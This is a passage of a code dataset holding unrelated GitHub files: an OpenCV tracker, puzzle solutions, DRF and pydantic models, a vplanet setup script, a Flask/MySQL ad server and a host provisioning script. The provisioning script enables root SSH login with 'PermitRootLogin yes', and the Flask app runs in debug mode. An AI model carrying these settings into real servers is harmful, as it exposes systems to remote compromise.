되고 나서는 해당 사람만 박싱해서 보여준다.\n # x1, y1, x2, y2 = objects[certification_Id]\n # text = f\"ID: {certification_Id}\"\n # cv2.putText(frame, text, (x1, y1 - 5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n # cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\n # -- no certification\n for (objectId, bbox) in objects.items():\n x1, y1, x2, y2 = bbox\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2)\n y2 = int(y2)\n\n text = \"ID: {}\".format(objectId)\n cv2.putText(frame, text, (x1, y1-5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n\n # 만약 사용자가 손을 든다면 (openpose)\n # 그 사용자의 objectID를 기억해서 그 사용자만 추적하기(?)\n if objectId == 2:\n # bounding box 출력\n cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 2)\n # text = \"ID: {}\".format(objectId)\n cv2.putText(frame, text, (x1, y1-5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n\n # frame write\n cv2.imwrite(os.path.join(self.write_path, f\"frame{self.frame_cnt}.jpg\"), frame)\n self.frame_cnt += 1\n # cv2.waitKey(1)\n\n if len(objects) > 0:\n if certification_Id >= 0: # Pass certification\n return [objects[certification_Id]]\n else:\n return [objects]\n else:\n return None\n","repo_name":"hyemWon/self_driving_drone","sub_path":"src/server/util/person_tracking.py","file_name":"person_tracking.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"325569989","text":"from argparse import ArgumentParser\nfrom build_assets.PathResolverAction import PathResolverAction\n\n\ndef get_selenium_runner_args(peek_mode=False):\n parser = ArgumentParser(description=\"Upload svgs to Icomoon to create icon files.\")\n\n parser.add_argument(\"--headless\",\n help=\"Whether to run the browser in headless/no UI mode\",\n action=\"store_true\")\n\n parser.add_argument(\"geckodriver_path\",\n help=\"The path to the firefox executable file\",\n action=PathResolverAction)\n\n parser.add_argument(\"icomoon_json_path\",\n help=\"The path to the icomoon.json aka the selection.json created by Icomoon\",\n action=PathResolverAction)\n\n parser.add_argument(\"devicon_json_path\",\n help=\"The path to the devicon.json\",\n action=PathResolverAction)\n\n parser.add_argument(\"icons_folder_path\",\n help=\"The path to the icons folder\",\n action=PathResolverAction)\n\n parser.add_argument(\"download_path\",\n help=\"The download destination of the Icomoon files\",\n action=PathResolverAction)\n\n if peek_mode:\n parser.add_argument(\"--pr_title\",\n help=\"The title of the PR that we are peeking at\")\n\n return parser.parse_args()","repo_name":"rvorine/appicons","sub_path":".github/scripts/build_assets/arg_getters.py","file_name":"arg_getters.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25198579674","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def verticalTraversal(self, root: Optional[TreeNode]) -> List[List[int]]:\n pos = {}\n \n def sub(node, x, y):\n if node is None:\n return\n \n if y not in pos:\n pos[y] = {}\n \n if x not in pos[y]:\n pos[y][x] = []\n \n pos[y][x].append(node.val)\n \n sub(node.left, x+1, y-1)\n sub(node.right, x+1, y+1)\n \n \n sub(root, 0, 0)\n \n ans = []\n for y in sorted(pos.keys()):\n ans_sub = []\n for x in sorted(pos[y].keys()):\n ans_sub += sorted(pos[y][x])\n \n ans.append(ans_sub)\n \n return ans","repo_name":"wijae/LeetCode","sub_path":"987-vertical-order-traversal-of-a-binary-tree/987-vertical-order-traversal-of-a-binary-tree.py","file_name":"987-vertical-order-traversal-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5729492163","text":"from enum import Enum\nfrom typing import List, Optional\n\nfrom rctools.models.base import IdMixin, ReadiChargeBaseModel, TimestampMixin\n\n\nclass Alert(IdMixin, TimestampMixin, ReadiChargeBaseModel):\n class AlertTypes(str, Enum):\n message = 'message' # icon: chat bubble\n notification = 'notification' # icon: bell\n payment_incoming = 'payment_incoming' # icon: dollar sign with arrow entering from left\n payment_outgoing = 'payment_outgoing' # icon: dollar sign with arrow exiting on right\n rating = 'rating' # icon: star\n warning = 'warning' # icon: red exclamation mark in a circle\n \n uid: Optional[str]\n title: str\n type: AlertTypes\n content: Optional[str]\n expired: Optional[int]\n path: Optional[str]\n path_id: Optional[str]\n rating: Optional[float]\n\n\nclass AlertsResponse(ReadiChargeBaseModel):\n alerts: Optional[List[Alert]] = []\n\n","repo_name":"yashkumarsingh995/api_testing","sub_path":"common/rctools/rctools/models/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73881302011","text":"def input_generator(input: str):\n for i in [int(i) for i in input.split(' ')]:\n yield i\n\n\ndef get_meta_data_sum(input: [int]) -> int:\n result = 0\n children = next(input)\n metadata = next(input)\n\n for _ in range(children):\n result += get_meta_data_sum(input)\n\n for _ in range(metadata):\n result += next(input)\n\n return result\n\n\nassert get_meta_data_sum(input_generator('0 1 99')) == 99\nassert get_meta_data_sum(input_generator('0 3 10 11 12')) == 33\nassert get_meta_data_sum(input_generator('1 1 0 1 99 2')) == 101\nassert get_meta_data_sum(input_generator('2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2')) == 138\n\n# The input taken from https://adventofcode.com/2018/day/8/input\ninput = '<input>'\nprint('Solution for first part:', get_meta_data_sum(input_generator(input)))\n\n\ndef get_root_node(input: [int]) -> int:\n result = 0\n children = next(input)\n metadata = next(input)\n\n if children == 0:\n for _ in range(metadata):\n result += next(input)\n else:\n children_roots = [get_root_node(input) for _ in range(children)]\n\n for _ in range(metadata):\n meta = next(input) - 1\n\n result += children_roots[meta] if meta < children else 0\n\n return result\n\n\ndef test_root_node(input: str, excepted):\n result = get_root_node(input_generator(input))\n\n assert result == excepted, f\"Except: {excepted} recived: {result}\"\n\n\ntest_root_node('0 1 99', 99)\ntest_root_node('0 3 10 11 12', 33)\ntest_root_node('1 1 0 1 99 2', 0)\ntest_root_node('2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2', 66)\n\n\nprint('Solution for second part:', get_root_node(input_generator(input)))\n","repo_name":"dplocki/advent-of-code","sub_path":"2018/2018_08.py","file_name":"2018_08.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37878717944","text":"\"\"\"\n\n@author: David P. Fleming, University of Washington, Seattle\n@email: dflemin3 (at) uw (dot) edu\nNov. 2018\n\nThis script produces a population of single stars.\n\nAssumptions:\n- Template files live directory where this script exists.\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport os\nfrom datetime import datetime\nimport stat\nimport sys\n\n# Constants/Control Flags\nnum = 10000 # Number of sets of initial conditions to generate\nPATH = os.path.dirname(os.path.realpath(__file__))\nsave_dist = True # Save initial condition distributions?\nshow_plots = True # visualize initial condition distributions?\nwrite_infiles = True # Write the vplanet input files, or just sample from distributions if False\nseed = int(os.getpid()*datetime.now().microsecond/100) # Random seed\n\n# Set RNG seed\nnp.random.seed(seed)\n\n# File names\nsys_name = \"vpl.in\"\nprimary_name = \"primary.in\"\n\n# Lists to hold stuff\npri_rot = []\npri_mass = []\n\nrunfile_names = []\n\n### Helper functions ###\ndef lognuniform(low=0, high=1, size=None, base=10.0):\n return np.power(base, np.random.uniform(low, high, size))\n# end function\n\n\n### Make the simulation initial conditions! ###\nfor ii in range(num):\n\n # Create a directory for the simulation to live in\n if write_infiles:\n directory = \"simulation_\" + str(ii)\n if not os.path.exists(os.path.join(PATH,directory)):\n os.makedirs(os.path.join(PATH,directory))\n\n ### Populate the primary input file ###\n\n # Read template input file\n with open(os.path.join(PATH, 'primary.in'), 'r') as f:\n primary_in = f.read()\n\n # Sample from priors for initial conditions\n\n # Loguniform initial rotation period prior over [0.8, 15] days (Matt+2015)\n dRotPeriod = -lognuniform(low=np.log10(0.8), high=np.log10(15.0)) # negative -> days\n\n # Mass is uniformly sampled over [0.1, 1.0]\n dMass = np.random.uniform(low=0.1, high=1.0)\n\n # Write initial conditions to file\n primary_in = re.sub('%s(.*?)#' % 'dRotPeriod', '%s %.5e #' % ('dRotPeriod', dRotPeriod), primary_in)\n primary_in = re.sub('%s(.*?)#' % 'dMass', '%s %.5e #' % ('dMass', dMass), primary_in)\n\n if write_infiles:\n with open(os.path.join(PATH, directory, primary_name), 'w') as f:\n print(primary_in, file = f)\n\n # Save em for later...\n pri_rot.append(-dRotPeriod)\n pri_mass.append(dMass)\n\n # Write vpl file\n\n # Read template input file\n with open(os.path.join(PATH, sys_name), 'r') as f:\n sys_in = f.read()\n\n # Age = 7 Gyr\n dAge = 7.0e9\n\n # Tell vpl.in file how many bodies are in simulation\n saBodyFiles = \"primary.in\"\n\n # Write vpl file\n sys_in = re.sub('%s(.*?)#' % 'dStopTime', '%s %.5e #' % ('dStopTime', dAge), sys_in)\n sys_in = re.sub('%s(.*?)#' % 'saBodyFiles', '%s %s #' % ('saBodyFiles', saBodyFiles), sys_in)\n\n if write_infiles:\n with open(os.path.join(PATH, directory, sys_name), 'w') as f:\n print(sys_in, file = f)\n\n # Generate *.sh file needed for cluster to run sims\n if write_infiles:\n command = os.path.join(PATH, directory + \".sh\")\n with open(command,\"w\") as g:\n g.write(\"#!/bin/bash\\n\")\n g.write(\"cd \" + os.path.join(PATH, directory) + \"\\n\") # Change dir to where sim is\n g.write(\"vplanet vpl.in\\n\") # Run sim command!\n\n # Now give that .sh file execute permissions\n st = os.stat(command)\n os.chmod(command, st.st_mode | stat.S_IEXEC)\n\n # Save file name for later...\n runfile_names.append(command)\n# end for loop\n\n# Write all runfile names to file needed for cluster\nif write_infiles:\n with open(os.path.join(PATH, \"vplArgs.txt\"), 'w') as f:\n for line in runfile_names:\n f.write(line + \"\\n\")\n\n# Save the distributions?\ncols = [\"primary_rot\",\"primary_mass\"]\n\n# Put data into a pandas dataframe\ndf = percentile_list = pd.DataFrame(np.column_stack([pri_rot,pri_mass]), columns=cols)\n\n# Dump it into a CSV since we'll use < 50,000 samples and this is good enough\nif save_dist:\n df.to_csv(os.path.join(PATH,\"mcSingle_distributions.csv\"))\n\n# Visualize the distributions?\nif show_plots:\n import matplotlib\n matplotlib.use(\"Agg\")\n import matplotlib.pyplot as plt\n\n fig, ax = plt.subplots(figsize=(18,16))\n\n df.hist(ax=ax, bins=\"auto\")\n fig.tight_layout()\n fig.savefig(os.path.join(PATH,\"dist_hist.pdf\"), bbox_inches=\"tight\")\n# Done!\n","repo_name":"dflemin3/sync","sub_path":"Scripts/setupMCSingle.py","file_name":"setupMCSingle.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12336463101","text":"from rest_framework import serializers\nfrom rest_framework_gis.serializers import GeoFeatureModelSerializer\n\nfrom sites.models import WorldBorder, Company, Site\n\n\nclass WorldBorderSerializer(GeoFeatureModelSerializer):\n class Meta:\n model = WorldBorder\n geo_field = \"mpoly\"\n\n fields = \"__all__\"\n\n\nclass CompanySerializer(serializers.ModelSerializer):\n class Meta:\n model = Company\n\n fields = \"__all__\"\n\n\nclass SiteSerializer(GeoFeatureModelSerializer):\n created_by = serializers.CharField(source='created_by.id', read_only=True)\n updated_by = serializers.CharField(source='updated_by.id', read_only=True, allow_null=True)\n country = serializers.CharField(source='country.name', read_only=True)\n\n class Meta:\n model = Site\n geo_field = \"position\"\n bbox_geo_field = \"mpoly\"\n\n fields = \"__all__\"\n","repo_name":"tomashchuk/geo_in_terra","sub_path":"sites/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42702920775","text":"# Python program to find maximum product subarray \nimport sys\n \n# Function for maximum product \ndef max_product(arr, n):\n \n # Initialize maximum products in forward and \n # backward directions \n max_fwd = -sys.maxsize -1\n max_bkd = -sys.maxsize -1 \n \n # Initialize current product \n max_till_now = 1 \n \n # max_fwd for maximum contiguous product in \n # forward direction \n # max_bkd for maximum contiguous product in \n # backward direction \n # iterating within forward direction in array \n for i in range(n): \n \n # if arr[i]==0, it is breaking condition \n # for contiguos subarray \n max_till_now = max_till_now * arr[i]\n if (max_till_now == 0):\n max_till_now = 1; \n continue\n \n if (max_fwd < max_till_now): #update max_fwd \n max_fwd = max_till_now \n \n \n max_till_now = 1 \n \n # iterating within backward direction in array \n for i in range(n-1,-1,-1):\n max_till_now = max_till_now * arr[i] \n \n if (max_till_now == 0): \n max_till_now = 1\n continue \n \n # update max_bkd \n if (max_bkd < max_till_now) : \n max_bkd = max_till_now \n \n # return max of max_fwd and max_bkd \n res = max(max_fwd, max_bkd) \n \n # Product should not be nagative. \n # (Product of an empty subarray is \n # considered as 0) \n return max(res, 0) \n\n \n# Driver Program to test above function \n \narr = [-1, -2, -3, 4] \nn = len(arr) \nprint(max_product(arr, n))\n\n ","repo_name":"YatinGupta777/Python-Programs","sub_path":"Gfg/maximum-product-subarray-set-2-using-two-traversals.py","file_name":"maximum-product-subarray-set-2-using-two-traversals.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41908348567","text":"# Importing the necessary libraries in to the environment\r\nimport sys\r\nimport flask\r\nfrom flask import request, jsonify,make_response\r\nimport uuid\r\nfrom flask import abort\r\nimport mysql.connector\r\n\r\n# Setting the environment values for Flask\r\napp = flask.Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\napp.config['RESTFUL_JSON'] = {\"ensure_ascii\": False}\r\n\r\n# Application to route if the url satisfies the below condition ; method to capture the values and insert into MySQL table\r\n@app.route('/ad/user/<request_id>/serve', methods=['GET'])\r\ndef serve(request_id):\r\n # Initializing MySQL database connection with input from CLI using connector\r\n db = mysql.connector.connect(\r\n host=app.config.get('database_host'),\r\n user=app.config.get('database_username'),\r\n password=app.config.get('database_password'),\r\n database=app.config.get('database_name')\r\n )\r\n \r\n # We are initializing three cursors in order to do three distinct operations simultaneously\r\n db_cursor_ad = db.cursor(buffered=True)\r\n db_cursor_users = db.cursor(buffered=True)\r\n db_cursor_served_ads = db.cursor()\r\n text1=''\r\n \r\n # Checking if id is not from masked users\r\n if request_id != '1111-1111-1111-1111':\r\n # Gathering the arguments from the request\r\n device_t = request.args['device_type']\r\n city_t = request.args['city']\r\n state_t = request.args['state']\r\n user_id = request_id\r\n \r\n # DB select query to capture the users from the request id\r\n db_cursor_users.execute(\"Select * from users where id = %s\",(user_id,))\r\n \r\n # Fetching all the values for the cursors\r\n users = db_cursor_users.fetchall()\r\n \r\n #Looping over user to get the details\r\n for user in users:\r\n target_gen = user[2]\r\n target_age = user[1]\r\n target_income = user[4]\r\n \r\n # DB select query to capture the available ads for the specified condition\r\n select_query_ads = \"\"\"Select distinct text,campaign_id, target_device,cpa,cpc,cpm,target_age_start,target_age_end,target_city,target_state,target_country,target_gender,\r\n target_income_bucket,Date_range_start,Date_range_end ,Time_range_start ,Time_range_end from ads where (target_device='All' or target_device = %s) \r\n and ( (target_city='All' or target_city = %s) and (target_state='All' or target_state = %s)) and (target_country='All' or target_country = %s) and\r\n (Target_gender = %s or Target_gender= 'All') and ((target_age_start >= %s and target_age_end <= %s) or (target_age_start=0 and target_age_end=0))\r\n and (target_income_bucket = %s or target_income_bucket='All') and status = 'ACTIVE' order by cpm desc limit 2\r\n \"\"\"\r\n \r\n # DB execute query to capture the available ads for the specified condition\r\n db_cursor_ad.execute(select_query_ads,(device_t,city_t,state_t,target_gen,target_age,target_age,target_income,))\r\n \r\n # Fetching all the values for the cursors\r\n ads = db_cursor_ad.fetchall()\r\n \r\n # Handling condition to see if there is only one ad available for the condition specified\r\n if len(ads)!=2:\r\n for ad in ads:\r\n text1=ad[0]\r\n campaign_id = ad[1]\r\n auc_cpm = ad[5] # Paying the same auction as it is the single winner \r\n auc_cpc = ad[4]\r\n auc_cpa = ad[3]\r\n targ_age_range = {\"start\": ad[6],\"end\": ad[7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ad[8],\"state\": ad[9],\"country\": ad[10]} # Clubbing the values in the json format\r\n targ_gen = ad[11]\r\n targ_income = ad[12]\r\n targ_dev = ad[2]\r\n camp_start = ad[13]+\" \"+ad[15] # Clubbing the values in the string format\r\n camp_end = ad[14]+\" \"+ad[16] # Clubbing the values in the string format\r\n # Handling condition to see if there are multiple ads available for the condition specified\r\n else:\r\n text1=ads[0][0]\r\n campaign_id = ads[0][1]\r\n auc_cpm = ads[1][5] # Paying the auction to the second ad winner \r\n auc_cpc = ads[0][4]\r\n auc_cpa = ads[0][3]\r\n targ_age_range = {\"start\": ads[0][6],\"end\": ads[0][7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ads[0][8],\"state\": ads[0][9],\"country\": ads[0][10]} # Clubbing the values in the json format\r\n targ_gen = ads[0][11]\r\n targ_income = ads[0][12]\r\n targ_dev = ads[0][2]\r\n camp_start = ads[0][13]+\" \"+ads[0][15] # Clubbing the values in the string format\r\n camp_end = ads[0][14]+\" \"+ads[0][16] # Clubbing the values in the string format\r\n \r\n # Checking if id is a masked users \r\n else:\r\n # Gathering the arguments from the request\r\n device_t = request.args['device_type']\r\n city_t = request.args['city']\r\n state_t = request.args['state']\r\n user_id = request_id\r\n \r\n select_query_ads = \"\"\"Select distinct text,campaign_id, target_device,cpa,cpc,cpm,target_age_start,target_age_end,target_city,target_state,target_country,\r\n target_gender,target_income_bucket,Date_range_start,Date_range_end ,Time_range_start ,Time_range_end \r\n from ads where (target_device='All' or target_device = %s) and (target_city='All' or target_city = %s) \r\n and (target_state='All' or target_state = %s)and (target_country='All' or target_country = %s) and status = 'ACTIVE' order by cpm desc limit 2\r\n \"\"\"\r\n \r\n # DB select query to capture the available ads for the specified condition\r\n db_cursor_ad.execute(select_query_ads,(device_t,city_t,state_t,))\r\n \r\n # Fetching all the values for the cursors\r\n ads = db_cursor_ad.fetchall()\r\n \r\n # Handling condition to see if there is only one ad available for the condition specified\r\n if len(ads)!=2:\r\n for ad in ads:\r\n text1=ad[0]\r\n campaign_id = ad[1] # Paying the same auction as it is the single winner \r\n auc_cpm = ad[5]\r\n auc_cpc = ad[4]\r\n auc_cpa = ad[3]\r\n targ_age_range = {\"start\": ad[6],\"end\": ad[7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ad[8],\"state\": ad[9],\"country\": ad[10]} # Clubbing the values in the json format\r\n targ_gen = ad[11]\r\n targ_income = ad[12]\r\n targ_dev = ad[2]\r\n camp_start = ad[13]+\" \"+ad[15] # Clubbing the values in the string format\r\n camp_end = ad[14]+\" \"+ad[16] # Clubbing the values in the string format\r\n else:\r\n text1=ads[0][0]\r\n campaign_id = ads[0][1]\r\n auc_cpm = ads[1][5] # Paying the auction to the second ad winner \r\n auc_cpc = ads[0][4]\r\n auc_cpa = ads[0][3]\r\n targ_age_range = {\"start\": ads[0][6],\"end\": ads[0][7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ads[0][8],\"state\": ads[0][9],\"country\": ads[0][10]} # Clubbing the values in the json format\r\n targ_gen = ads[0][11] \r\n targ_income = ads[0][12]\r\n targ_dev = ads[0][2]\r\n camp_start = ads[0][13]+\" \"+ads[0][15] # Clubbing the values in the string format\r\n camp_end = ads[0][14]+\" \"+ads[0][16] # Clubbing the values in the string format\r\n \r\n # Handling condition to see if there is an ad shown to the user\r\n if len(ads)!=0: \r\n # Deriving the unique id from uuid package\r\n request_id_derived = str(uuid.uuid1())\r\n \r\n # DB insert query for the captured ads for the user\r\n insert_sql = \"\"\"INSERT IGNORE INTO capstone.served_ads(Request_id, Campaign_id,User_id,Auction_cpm,Auction_cpc,Auction_cpa,Target_age_range,Target_location,Target_gender,Target_income_bucket,Target_device_type,Campaign_start_time,Campaign_end_time,Time_stamp) \\\r\n VALUES (%s, %s,%s,%s,%s,%s,%s,%s,%s, %s,%s,%s,%s,%s)\"\"\"\r\n \r\n # Insert Query value to pass in to insert query for served_ads table\r\n insert_val = (request_id_derived, campaign_id,user_id,auc_cpm,auc_cpc,auc_cpa,str(targ_age_range),str(targ_loc),targ_gen,targ_income,targ_dev,camp_start,camp_end,\"\")\r\n \r\n # Executing the query to insert in to served_ads table\r\n db_cursor_served_ads.execute(insert_sql, insert_val)\r\n \r\n # Commiting the DB in order to values get reflected instantly in the table\r\n db.commit()\r\n \r\n # Printing the values captured in the console\r\n print(str(request_id_derived)+\" | \"+str(campaign_id) +\" | \"+str(user_id) +\" | \"+'{:.12f}'.format(auc_cpm) +\" | \"+str(auc_cpc) +\" | \"+str(auc_cpa) +\" | \"+str(targ_age_range) +\" | \"+str(targ_loc) +\" | \"+str(targ_gen) +\" | \"+str(targ_income) +\" | \"+str(targ_dev) +\" | \"+str(camp_start) +\" | \"+str(camp_end) +\" | 0000-00-00 00:00:00\")\r\n # Handling condition to see if no ad shown to the user \r\n else:\r\n print(\"Sorry!!! No Ads Available to show\")\r\n \r\n # Closing the DB Connection\r\n db.close()\r\n \r\n # Returning the values with text and request_id\r\n return jsonify({\"text\": text1,\"request_id\": request_id}) \r\n\r\n# Defining the main method\r\nif __name__ == \"__main__\":\r\n# Validate Command line arguments\r\n if len(sys.argv) != 6:\r\n print(\"Usage: ad_server.py <database_host> <database_username> <database_password> <database_name> <flask_app_port>\")\r\n exit(-1)\r\n \r\n # Captured the values from CLI in to the variables to pass it to initiate method\r\n app.config['database_host'] = sys.argv[1]\r\n app.config['database_username'] = sys.argv[2]\r\n app.config['database_password'] = sys.argv[3]\r\n app.config['database_name'] = sys.argv[4]\r\n \r\n # Processing using exception handling in order to throw an error if it occurs\r\n try:\r\n app.run(host=sys.argv[1], port=sys.argv[5])\r\n # Will exit the program if we hit ctrl+c \r\n except KeyboardInterrupt:\r\n print('Keyboard Interrupt detected!!! (ctrl+c) hitted, exiting the program...')\r\n \r\n ","repo_name":"sathyarviswanath/Data-Engineering","sub_path":"ad_server.py","file_name":"ad_server.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36913521666","text":"#!/usr/bin/python3\n#\n#\n\nimport os\nimport json\nimport mkisofs\n\ndef get_files():\n\tfiles = {}\n\treturn files\n\ndef pxe(bootserver):\n\tisolinuxtxtnet = \"\"\n\treturn isolinuxtxtnet\n\ndef autoseed(hostdata, tempdir, services):\n\t## generate configfiles ##\n\tos.system(\"mkdir -p \" + tempdir + \"/files/etc/sysconfig/network-scripts/\")\n\tdns = \"\"\n\tresolv = \"search \" + hostdata[\"domainname\"] + \"\\n\"\n\tfor nameserver in hostdata[\"network\"][\"nameservers\"]:\n\t\tresolv += \"nameserver \" + nameserver + \"\\n\"\n\t\tif dns == \"\":\n\t\t\tdns = nameserver\n\twith open(tempdir + \"/files/etc/resolv.conf\", \"w\") as ofile:\n\t\tofile.write(resolv)\n\thostname = hostdata[\"hostname\"] + \".\" + hostdata[\"domainname\"] + \"\\n\"\n\twith open(tempdir + \"/files/etc/hostname\", \"w\") as ofile:\n\t\tofile.write(hostname)\n\tfor interface in hostdata[\"network\"][\"interfaces\"]:\n\t\tif \"ipv4\" in hostdata[\"network\"][\"interfaces\"][interface]:\n\t\t\tfor ipv4 in hostdata[\"network\"][\"interfaces\"][interface][\"ipv4\"]:\n\t\t\t\tifcfg = \"#UUID=\\\"\\\"\\n\"\n\t\t\t\tifcfg += \"DNS1=\\\"\" + dns + \"\\\"\\n\"\n\t\t\t\tifcfg += \"IPADDR=\\\"\" + ipv4[\"address\"] + \"\\\"\\n\"\n\t\t\t\tifcfg += \"GATEWAY=\\\"\" + hostdata[\"network\"][\"gateway\"] + \"\\\"\\n\"\n\t\t\t\tifcfg += \"NETMASK=\\\"\" + ipv4[\"netmask\"] + \"\\\"\\n\"\n\t\t\t\tifcfg += \"BOOTPROTO=\\\"static\\\"\\n\"\n\t\t\t\tifcfg += \"DEVICE=\\\"\" + interface + \"\\\"\\n\"\n\t\t\t\tifcfg += \"ONBOOT=\\\"yes\\\"\\n\"\n\t\t\t\tifcfg += \"IPV6INIT=\\\"yes\\\"\\n\"\n\t\t\t\twith open(tempdir + \"/files/etc/sysconfig/network-scripts/ifcfg-\" + interface + \"\", \"w\") as ofile:\n\t\t\t\t\tofile.write(ifcfg)\n\n\n\t## generate setup script ##\n\tsetup = \"#!/bin/sh\\n\"\n\tsetup += \"\\n\"\n\tsetup += \"\\n\"\n\tsetup += \"\\n\"\n\twith open(tempdir + \"/setup.sh\", \"w\") as ofile:\n\t\tofile.write(setup)\n\n\tpostsh = \"\"\n\tpostsh += \"#!/bin/sh\\n\"\n\tpostsh += \"\\n\"\n\tpostsh += \"sed -i \\\"s|^#PermitRootLogin .*|PermitRootLogin yes|g\\\" /etc/ssh/sshd_config\\n\"\n\tpostsh += \"\\n\"\n\tuserflag = False\n\tfor user in hostdata[\"users\"]:\n\t\tif user == \"root\":\n\t\t\tif \"sshpubkey\" in hostdata[\"users\"][user]:\n\t\t\t\tpostsh += \"mkdir -p /root/.ssh\\n\"\n\t\t\t\tpostsh += \"chown root:root /root/.ssh\\n\"\n\t\t\t\tpostsh += \"chmod 700 /root/.ssh\\n\"\n\t\t\t\tpostsh += \"echo \\\"\" + hostdata[\"users\"][user][\"sshpubkey\"] + \"\\\" >> /root/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"chown root:root /root/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"chmod 600 /root/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"\\n\"\n\t\telif userflag == False:\n\t\t\tif \"sshpubkey\" in hostdata[\"users\"][user]:\n\t\t\t\tpostsh += \"mkdir -p /home/\" + user + \"/.ssh\\n\"\n\t\t\t\tpostsh += \"chown \" + user + \":\" + user + \" /home/\" + user + \"/.ssh\\n\"\n\t\t\t\tpostsh += \"chmod 700 /home/\" + user + \"/.ssh\\n\"\n\t\t\t\tpostsh += \"echo \\\"\" + hostdata[\"users\"][user][\"sshpubkey\"] + \"\\\" >> /home/\" + user + \"/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"chown \" + user + \":\" + user + \" /home/\" + user + \"/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"chmod 600 /home/\" + user + \"/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"\\n\"\n\tpostsh += \"\\n\"\n\twith open(tempdir + \"/post.sh\", \"w\") as ofile:\n\t\tofile.write(postsh)\n\n\tif \"iso\" in hostdata:\n\t\tif not os.path.exists(tempdir + \"/auto.iso\"):\n\t\t\t# mod fetch-macOS.py to get the right image without manuel selction\n\t\t\t# ./fetch-macOS.py -h -> isoimages/OSX-BaseSystem.img\n\t\t\t# copy isoimages/OSX-BaseSystem.img tempdir + \"/auto.iso\"\n\t\t\tprint(\"\")\n\n\n\n\n","repo_name":"multigcs/testnetz","sub_path":"systems/osx.py","file_name":"osx.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71399533371","text":"import DoubleLinkedList as DLList\nimport Functions as F\nimport csv\n\n_par_sigla_pais = {};\n\ndef read_csv_files():\n \"\"\" Ler os dados do ficheiro \"\"\"\n i = 0\n data_list = []\n with open('dados.csv','r') as fp:\n csvreader = csv.reader(fp,delimiter=\";\", quotechar='\"')\n for row in csvreader:\n list = ('|'.join(row)).split('|')\n data_list.append(list)\n _par_sigla_pais[data_list[i][0]] = data_list[i][1]\n i = i + 1\n \"\"\" Retorna toda a informcao do ficheiro numa lista \"\"\"\n return data_list\n\ndef read_inputs():\n data = read_csv_files()\n DList = DLList.DoubleLinkedList()\n Function = F.Functions(1,DList,_par_sigla_pais)\n\n \"\"\" Cada no vai ter informacao sobre um pais \"\"\"\n for i in range(len(data)-1):\n DList.add_end(data[i])\n\n print(\"Search\")\n with open(\"search_country.txt\", \"r\") as f:\n for line in f:\n #print(line[:-1])\n Function.search(line[:-1])\n print(\"Insert\\n\")\n with open(\"insert_country.txt\", \"r\") as f:\n for line in f:\n new_l = line.split(\" \")\n #print(new_l[1][:-1])\n Function.inser_new_country(new_l[0],new_l[1][:-1])\n\n print(\"Remove\\n\")\n with open(\"remove.txt\",\"r\") as f:\n for line in f:\n Function.remove_country(line[:-1])\n\n print(\"Edit\\n\")\n with open(\"edit.txt\",\"r\") as f:\n for line in f:\n new_l = line.split(\"#\")\n print(new_l[0])\n Function.edit(new_l[0],int(new_l[1]),new_l[2][:-1])\n\nif __name__ == '__main__':\n read_inputs()\n","repo_name":"ZeCanelha/AED_PROJECTO1","sub_path":"read_inputs.py","file_name":"read_inputs.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70128753852","text":"from rest_framework import status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\nfrom django.conf import settings\nfrom rest_framework_simplejwt.exceptions import InvalidToken, TokenError\nfrom django.urls import reverse\nfrom users.models import User\nfrom django.http 